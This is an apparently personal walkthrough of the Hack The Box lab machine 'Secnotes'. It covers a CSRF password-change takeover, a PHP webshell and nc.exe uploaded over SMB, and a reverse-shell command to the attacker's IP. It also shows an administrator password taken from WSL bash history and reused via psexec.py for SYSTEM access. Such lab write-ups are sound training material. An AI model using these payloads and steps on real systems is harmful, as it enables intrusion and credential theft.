Secnotes

WSL is explained in this post: https://swepstopia.com/windows-subsystem-for-linux/

Initial nmap

sudo nmap -sS -sV -p- -Pn -n --disable-arp-ping -v 10.10.10.97

PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: HTB)
8808/tcp open http Microsoft IIS httpd 10.0
Service Info: Host: SECNOTES; OS: Windows; CPE: cpe:/o:microsoft:windows

Website brings us to a login page.

Creating a new account takes us to a note taking system with the ability to create new notes and change passwords. It also displays a username “tyler”.

Enumerating the change passwords request we can see there are no CSRF tokens present nor does the page require the user to input their old password which means that we can craft our own request and have another user submit it then they will perform the action.

The request captured in ZAP:

Crafting our own URL using the arguments in the data field. Any user that clicks this will have their password changed to “password1”. Note the weak password policy also.

http://10.10.10.97/change_pass.php?password=password1&confirm_password=password1&submit=submit

Logging in as Tyler after a minute finds a note with a password to the SMB share. Note: Hack The Box utilises scripts to simulate users for boxes like this. That is why submitting the link works despite not having anyone actually click the link.

Listing shares:

smbclient -L \\\\10.10.10.97\\ -U tyler
Enter WORKGROUP\tyler's password:

Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
new-site Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.97 failed (Error NT_STATUS_IO_TIMEOUT)
Unable to connect with SMB1 -- no workgroup available

Looking inside the new-site share is the web server directory. Perfect place to upload a webshell:

smbclient \\\\10.10.10.97\\new-site -U tyler
Enter WORKGROUP\tyler's password:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Thu Oct 14 19:48:25 2021
.. D 0 Thu Oct 14 19:48:25 2021
iisstart.htm A 696 Thu Jun 21 11:26:03 2018
iisstart.png A 98757 Thu Jun 21 11:26:03 2018

7736063 blocks of size 4096. 3387574 blocks available
smb: \>

Using PHP shell from kali:

/usr/share/webshells/php/windows-php-reverse-shell/Reverse\ Shell.php

smb: \> PUT shelly.php
putting file shelly.php as \shelly.php (87.4 kb/s) (average 87.4 kb/s)
smb: \> dir
. D 0 Thu Oct 14 19:57:36 2021
.. D 0 Thu Oct 14 19:57:36 2021
iisstart.htm A 696 Thu Jun 21 11:26:03 2018
iisstart.png A 98757 Thu Jun 21 11:26:03 2018
shelly.php A 6537 Thu Oct 14 19:57:36 2021

7736063 blocks of size 4096. 3387609 blocks available
smb: \>

Being that there are two webservers running and our shell does not execute from standard port 80, we  can try port 8808 as enumerated from our initial nmap scan. This shell resulted in and we did not get a shell.

“500 – Internal server error.
There is a problem with the resource you are looking for, and it cannot be displayed.”

Time to simplify with a basic php shell to try get some basic rce happening.

echo ‘<?php echo shell_exec($_GET[‘cmd’]); ?>’ >> shelly_cmd.php

smb: \> PUT shelly_cmd.php
putting file shelly_cmd.php as \shelly_cmd.php (0.6 kb/s) (average 170.2 kb/s)

So it seems the server is deleting files in the smb directory… Upload again and try get rce:

Uploading nc.exe to catch a shell:

smb: \> PUT nc.exe
putting file nc.exe as \nc.exe (360.2 kb/s) (average 207.4 kb/s)
smb: \>

http://10.10.10.97:8808/shelly.php?cmd=nc.exe%20-e%20cmd.exe%2010.10.14.27%204444

Annnnnnnnnd SHELL:

listening on [any] 4444 ...
connect to [10.10.14.27] from (UNKNOWN) [10.10.10.97] 50191
Microsoft Windows [Version 10.0.17134.228]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\inetpub\new-site>

On Tylers Desktop there is a link called “bash.lnk”

Directory of C:\Users\tyler\Desktop

08/19/2018 03:51 PM <DIR> .
08/19/2018 03:51 PM <DIR> ..
06/22/2018 03:09 AM 1,293 bash.lnk
08/02/2021 03:32 AM 1,210 Command Prompt.lnk
04/11/2018 04:34 PM 407 File Explorer.lnk
06/21/2018 05:50 PM 1,417 Microsoft Edge.lnk
06/21/2018 09:17 AM 1,110 Notepad++.lnk
10/14/2021 06:21 PM 34 user.txt
08/19/2018 10:59 AM 2,494 Windows PowerShell.lnk
7 File(s) 7,965 bytes
2 Dir(s) 13,912,768,512 bytes free

Trying to read the file returns a bunch of garbage with some plaintext pointing to bash.exe. This indicates the Windows Sub system for Linux is being used. “C:\Windows\System32\bash.exe

C:\Users\tyler>type Desktop\bash.lnk
type Desktop\bash.lnk
L�F w������V� �v(��� ��9P�O� �:i�+00�/C:\V1�[email protected] ヒL���LI.h���&WindowsZ1�L<System32B ヒL���L<.p�k�System32▒Z2��LP� bash.exeB ヒL<��LU.�Y����bash.exe▒K-JںݜC:\Windows\System32\bash.exe"..\..\..\Windows\System32\bash.exeC:\Windows\System32�%�
�wN�▒�]N�D.��Q���`�Xsecnotesx�<sAA��㍧�o�:u��'�/�x�<sAA��㍧�o�:u��'�/�= �Y1SPS�0��C�G����sf"=dSystem32 (C:\Windows)�1SPS��XF�L8C���&�m�q/S-1-5-21-1791094074-1363918840-4199337083-1002�1SPS0�%��G▒��`����%
[email protected]������
�)
[email protected](��� �i1SPS�jc(=�����O�▒�MC:\Windows\System32\bash.exe91SPS�mD��pH�[email protected]�=x�hH�(�bP

Bash.exe does not exist in System32. Searching for it with “where /R c:\ bash.exe” finds it.

C:\inetpub\new-site>where /R c:\ bash.exe
where /R c:\ bash.exe

c:\Windows\WinSxS\amd64_microsoft-windows-lxss-bash_31bf3856ad364e35_10.0.17134.1_none_251beae725bc7de5\bash.exe

Executing Bash.exe drops us into WSL:

C:\inetpub\new-site>c:\Windows\WinSxS\amd64_microsoft-windows-lxss-bash_31bf3856ad364e35_10.0.17134.1_none_251beae725bc7de5\bash.exe
c:\Windows\WinSxS\amd64_microsoft-windows-lxss-bash_31bf3856ad364e35_10.0.17134.1_none_251beae725bc7de5\bash.exe
mesg: ttyname failed: Inappropriate ioctl for device
uname -a
Linux SECNOTES 4.4.0-17134-Microsoft #137-Microsoft Thu Jun 14 18:46:00 PST 2018 x86_64 x86_64 x86_64 GNU/Linux
id
uid=0(root) gid=0(root) groups=0(root)

Note, this is root on WSL and not on the windows machine it is hosted on.

Catting out the bash history finds an administrator password for the SMB share:

cat .bash_history
cd /mnt/c/
ls
cd Users/
cd /
cd ~
ls
pwd
mkdir filesystem
mount //127.0.0.1/c$ filesystem/
sudo apt install cifs-utils
mount //127.0.0.1/c$ filesystem/
mount //127.0.0.1/c$ filesystem/ -o user=administrator
cat /proc/filesystems
sudo modprobe cifs
smbclient
apt install smbclient
smbclient
smbclient -U 'administrator%u6!4ZwgwOM#^OBf#Nwnh' \\\\127.0.0.1\\c$
> .bash_history
less .bash_history

smbclient -U ‘administrator%u6!4ZwgwOM#^OBf#Nwnh’ \\\\127.0.0.1\\c$

Connecting to the share, retrieving the root.txt flag.

[email protected]:~# smbclient -U 'administrator%u6!4ZwgwOM#^OBf#Nwnh' \\\\127.0.0.1\\c$
\\c$lient -U 'administrator%u6!4ZwgwOM#^OBf#Nwnh' \\\\127.0.0.1\
WARNING: The "syslog" option is deprecated
Try "help" to get a list of possible commands.

smb: \> cd Users/administrator
cd Users/administrator
smb: \Users\administrator\> cd Desktop
cd Desktop
smb: \Users\administrator\Desktop\> dir
dir
. DR 0 Tue Jan 26 02:39:01 2021
.. DR 0 Tue Jan 26 02:39:01 2021
desktop.ini AHS 282 Sun Aug 19 10:01:17 2018
Microsoft Edge.lnk A 1417 Fri Jun 22 16:45:06 2018
root.txt AR 34 Thu Oct 14 18:21:56 2021

7736063 blocks of size 4096. 3398036 blocks available
smb: \Users\administrator\Desktop\> get root.txt
get root.txt
getting file \Users\administrator\Desktop\root.txt of size 34 as root.txt (8.3 KiloBytes/sec) (average 8.3 KiloBytes/sec)
smb: \Users\administrator\Desktop\> exit
exit
[email protected]:~# dir
dir
filesystem root.txt
[email protected]:~# cat root.txt
cat root.txt
4d90<snip>326

Full shell command line access using PSExec:

psexec.py "administrator":'u6!4ZwgwOM#^OBf#Nwnh'@10.10.10.97
Impacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation

[*] Requesting shares on 10.10.10.97.....
[*] Found writable share ADMIN$
[*] Uploading file ZXavKgAz.exe
[*] Opening SVCManager on 10.10.10.97.....
[*] Creating service drlL on 10.10.10.97.....
[*] Starting service drlL.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17134.228]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>whoami
nt authority\system

Mitigations

CSRF Tokens and requiring the user enter their old password in order to change their password.